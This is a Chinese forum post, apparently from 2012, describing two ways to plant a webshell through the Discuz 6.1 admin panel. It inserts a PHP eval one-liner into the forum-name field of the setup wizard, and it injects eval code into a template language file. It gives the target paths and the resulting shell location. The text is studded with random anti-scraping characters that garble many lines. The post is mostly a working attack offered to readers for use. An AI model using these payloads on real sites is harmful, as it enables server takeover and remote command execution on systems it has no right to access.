discuz6.1两种方法后台拿shell
H4 k6 e3 r8 _& U好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下7 A; W; [7 x+ y4 ]( K1 _
1: ~) p1 e+ F E0 P, J* ? G5 o: P
http://127.0.0.1/discuz/admincp. ... zard&frames=yes$ {7 |& w2 z( q! `) L# {( W; Y# ?
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
6 U, O: y6 q) S% _2 ]+ g<?php eval($_POST[cmd]);?>
O2 U! M; k3 P: m3 s4 D( p后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
, n' Y3 O5 D* l$ X. S) @" M! j& H' r5 y
9 [: _: @$ q) m6 e: Z
2:后台模板管理--默认模板套系--详情
9 X9 Y3 b1 m! M- m* X# p% _- itemplates/default/actions.lang.php
7 W$ G4 \- l5 H+ ] a0 Q3 rjhackj\\');eval($_POST[cmd])?>;//
, D# Y" P7 e7 I/ Z& b( z$ T% t' n7 t! B* y B
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对